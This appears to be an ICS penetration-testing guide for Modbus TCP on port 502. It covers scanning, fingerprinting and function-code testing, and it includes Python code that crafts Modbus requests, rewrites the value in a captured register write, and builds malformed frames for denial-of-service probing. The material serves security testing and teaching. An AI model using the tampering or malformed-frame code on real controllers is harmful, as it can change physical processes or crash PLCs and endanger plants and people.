Modbus - Port 502

Modbus is a communication protocol used in industrial automation to allow devices like programmable logic controllers (PLCs) to talk to each other.


Basic info

Modbus was published by Modicon in 1979 as a serial-line protocol and was later carried over TCP as Modbus TCP/IP. It uses a master-slave model (the current specification calls it client-server): one master polls and writes to one or more slave devices, each addressed by a unit identifier. Modbus TCP/IP listens on TCP port 502 by default. The base protocol has no authentication, no encryption and no message integrity check, so any host that can reach port 502 can read and write a device's coils and registers, which is why the port is a key target in an ICS penetration test.

Workflow

  • Scan for Devices: Use Nmap to find hosts listening on TCP port 502; its modbus-discover NSE script also queries each responder for unit IDs and device identification.

  • Fingerprint the System: Use Metasploit's modbusdetect module to confirm that a host actually speaks Modbus, and the Read Device Identification function (0x2B with MEI type 0x0E) to learn vendor, product and firmware version where the device supports it.

  • Check Security Features: Modbus itself has no authentication, so confirm whether the device or an in-line gateway adds any access control (IP allow-lists, a hardware write-protect switch, Modbus/TCP Security over TLS on port 802). Most deployments add none, so anyone on the network can issue commands.

  • Test Function Codes: Enumerate which function codes the device accepts (reads such as 0x01 Read Coils and 0x03 Read Holding Registers, writes such as 0x05, 0x06, 0x0F and 0x10) and what data they expose. Writes change physical process state, so only issue them against lab equipment or with the owner's explicit agreement.

  • Look for Exploits: Probe the robustness of the Modbus stack with malformed and oversized requests, and test for man-in-the-middle attacks, which are straightforward because Modbus traffic carries no encryption or integrity protection.

Unexpected Detail: Lack of Encryption

Modbus communication is unencrypted and unauthenticated: frames carry no MAC, signature or even an application-level checksum, so an attacker on the path can read every coil and register value and silently alter a write before the PLC sees it. In a plant this means the same network access that reads a temperature can change a setpoint.


Scanning for Devices

Start by scanning for hosts listening on TCP port 502 with Nmap. Its modbus-discover NSE script follows up each open port with Modbus queries and reports the unit IDs and any device identification the target returns, which gives an initial inventory of devices and what they are.

Initial Reconnaissance

Use Metasploit for deeper reconnaissance. The auxiliary/scanner/scada/modbusdetect module confirms that a host actually speaks Modbus rather than merely having port 502 open. Then enumerate unit IDs with auxiliary/scanner/scada/modbus_findunitid, which tries each unit identifier and reports the ones that answer; behind a serial-to-TCP gateway each answering ID is a separate slave device.

Interacting with Devices

Smod is a Python framework for Modbus penetration testing with a Metasploit-style console. Clone it from its GitHub repository, launch the console, and point it at the target's IP address. Its modules enumerate the function codes the device accepts and read or write individual coils and registers, for example reading holding registers to map the process values, then writing a single register to confirm that writes are accepted (in a lab only, since writes change the physical process).
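The raw exchange that tools like Smod wrap, as an added example that is not part of the original page or of Smod's code: it builds Modbus TCP requests (MBAP header plus PDU) for Read Coils, Read Holding Registers and Write Single Register, sends one over a plain TCP socket, and decodes normal and exception replies. The three sample replies are constructed here so the parser can be exercised without a device; the host address in the final comment is a documentation address, not a real target.

```python
import socket
import struct

# Function codes from the Modbus Application Protocol specification.
READ_COILS = 0x01
READ_HOLDING_REGISTERS = 0x03
WRITE_SINGLE_REGISTER = 0x06
EXCEPTION_FLAG = 0x80  # set in the function code byte of an exception response

EXCEPTION_NAMES = {
    0x01: "ILLEGAL FUNCTION",
    0x02: "ILLEGAL DATA ADDRESS",
    0x03: "ILLEGAL DATA VALUE",
    0x04: "SLAVE DEVICE FAILURE",
}


def build_adu(txid, unit_id, pdu):
    """Prefix a PDU with the 7-byte MBAP header: transaction id, protocol id (always 0),
    length (unit id byte + PDU), unit id. There is no authentication or integrity field."""
    return struct.pack(">HHHB", txid, 0, len(pdu) + 1, unit_id) + pdu


def read_coils_request(txid, unit_id, start, quantity):
    if not 1 <= quantity <= 2000:  # spec limit for function 0x01
        raise ValueError("quantity out of range")
    return build_adu(txid, unit_id, struct.pack(">BHH", READ_COILS, start, quantity))


def read_holding_registers_request(txid, unit_id, start, quantity):
    if not 1 <= quantity <= 125:  # spec limit for function 0x03
        raise ValueError("quantity out of range")
    return build_adu(txid, unit_id, struct.pack(">BHH", READ_HOLDING_REGISTERS, start, quantity))


def write_single_register_request(txid, unit_id, address, value):
    return build_adu(txid, unit_id, struct.pack(">BHH", WRITE_SINGLE_REGISTER, address, value))


def parse_response(adu):
    """Decode a response ADU into a dict; an 'exception' key means the device refused."""
    if len(adu) < 9:
        raise ValueError("ADU too short for MBAP header + function code + data")
    txid, proto, length, unit_id = struct.unpack(">HHHB", adu[:7])
    if proto != 0:
        raise ValueError(f"unexpected protocol id {proto}")
    if length != len(adu) - 6:
        raise ValueError(f"MBAP length {length} != {len(adu) - 6} bytes actually present")
    pdu = adu[7:]
    fc = pdu[0]
    out = {"txid": txid, "unit_id": unit_id, "fc": fc & 0x7F}
    if fc & EXCEPTION_FLAG:
        out["exception"] = EXCEPTION_NAMES.get(pdu[1], f"code 0x{pdu[1]:02x}")
    elif fc == READ_COILS:
        n = pdu[1]
        # Coil status is packed LSB-first: bit 0 of the first byte is the first coil.
        out["coils"] = [bool(b >> i & 1) for b in pdu[2:2 + n] for i in range(8)]
    elif fc == READ_HOLDING_REGISTERS:
        n = pdu[1]
        out["registers"] = list(struct.unpack(f">{n // 2}H", pdu[2:2 + n]))
    elif fc == WRITE_SINGLE_REGISTER:
        out["address"], out["value"] = struct.unpack(">HH", pdu[1:5])
    return out


def recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("device closed the connection")
        buf += chunk
    return buf


def transact(host, request, port=502, timeout=3.0):
    """Send one request ADU and read the complete reply. No handshake, no credentials:
    whoever can open the TCP connection is the master as far as the device knows."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        header = recv_exact(s, 7)
        length = struct.unpack(">H", header[4:6])[0]
        return header + recv_exact(s, length - 1)  # length counts the unit id already read


# Constructed replies (not captured from a real device) so the parser runs offline:
# Read Holding Registers returning 0x1234, 0x5678; Read Coils returning 0b00000101;
# exception 0x83/0x02 (Read Holding Registers refused: ILLEGAL DATA ADDRESS).
SAMPLE_RESPONSES = {
    "holding_regs": bytes.fromhex("00010000000701030412345678"),
    "coils": bytes.fromhex("00030000000401010105"),
    "exception": bytes.fromhex("000200000003018302"),
}


if __name__ == "__main__":
    for name, raw in SAMPLE_RESPONSES.items():
        print(name, parse_response(raw))
    # Against a lab device (192.0.2.10 is a documentation address, not a real target):
    # print(parse_response(transact("192.0.2.10", read_holding_registers_request(1, 1, 0, 2))))
```

The length check in parse_response matters in practice: gateways and some PLC stacks reply with a length field that disagrees with the bytes on the wire, and a client that silently trusts either value misreads the register data that follows.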

Exploiting Vulnerabilities

Check the robustness of the Modbus stack by sending oversized or malformed requests from Smod, for example a frame whose MBAP length field disagrees with the bytes actually sent, or a read whose quantity exceeds the specification's limits. A compliant device answers with an exception response; a device that stops responding has a denial-of-service weakness, which on a PLC is a serious finding in itself, so run these tests only against lab equipment. For man-in-the-middle attacks, capture traffic with Wireshark, whose mbtcp dissector decodes function codes, addresses and values. Then use Scapy to modify and resend the packets: because Modbus carries no integrity check, a changed register value in a replayed or forwarded write is accepted as-is.
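The frame manipulation behind the lack-of-encryption point above and behind the oversized-request and tampering steps in this section, as an added example that is not part of the original page or of Smod or Scapy: it rewrites the value inside a captured Write Single Register frame without touching anything else, and builds two malformed reads (a lying MBAP length field and an over-limit quantity). The captured frame is constructed for this example, not a real capture, and the delivery side of a live attack (ARP spoofing and resending with Scapy) is deliberately left out.

```python
import struct

WRITE_SINGLE_REGISTER = 0x06
READ_HOLDING_REGISTERS = 0x03

# Constructed frame, not a real capture: transaction 0x000a, unit 1,
# Write Single Register (0x06) of value 0x0064 (100) to holding register 0x0010.
CAPTURED_WRITE = bytes.fromhex("000a00000006010600100064")


def tamper_write_value(adu, new_value):
    """Return a copy of a Write Single Register ADU with only the value replaced.
    Nothing else has to change: the MBAP header carries no checksum, MAC or signature,
    and TCP's own checksum is recomputed by whichever host forwards the segment,
    so the PLC has no way to tell the altered write from the original."""
    fc, address, value = struct.unpack(">BHH", adu[7:12])
    if fc != WRITE_SINGLE_REGISTER:
        raise ValueError(f"not a Write Single Register frame (fc=0x{fc:02x})")
    if not 0 <= new_value <= 0xFFFF:
        raise ValueError("register values are 16-bit")
    return adu[:10] + struct.pack(">H", new_value)


def oversized_length_frame(unit_id=1):
    """Read Holding Registers request whose MBAP length field claims 0xFFFF bytes
    follow while only 6 actually do. A stack that trusts the header may over-read
    or hang waiting for the rest; an unresponsive device afterwards is a
    denial-of-service finding, not proof of a memory-corruption bug."""
    pdu = struct.pack(">BHH", READ_HOLDING_REGISTERS, 0, 1)
    return struct.pack(">HHHB", 0x00FF, 0, 0xFFFF, unit_id) + pdu


def oversized_quantity_frame(unit_id=1):
    """Read Holding Registers asking for 0xFFFF registers, far over the 125 the
    specification allows. A compliant device answers exception 0x03 (ILLEGAL DATA
    VALUE); a device that returns data or goes silent deserves a closer look."""
    pdu = struct.pack(">BHH", READ_HOLDING_REGISTERS, 0, 0xFFFF)
    return struct.pack(">HHHB", 0x0100, 0, len(pdu) + 1, unit_id) + pdu


if __name__ == "__main__":
    print("original :", CAPTURED_WRITE.hex())
    print("tampered :", tamper_write_value(CAPTURED_WRITE, 0).hex())
    print("bad length:", oversized_length_frame().hex())
    print("bad qty  :", oversized_quantity_frame().hex())
```

The only field a live MITM has to keep consistent is the transaction id, which the master uses to match replies to requests; since it is copied unchanged here, the device's echo reply still matches the master's outstanding request.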

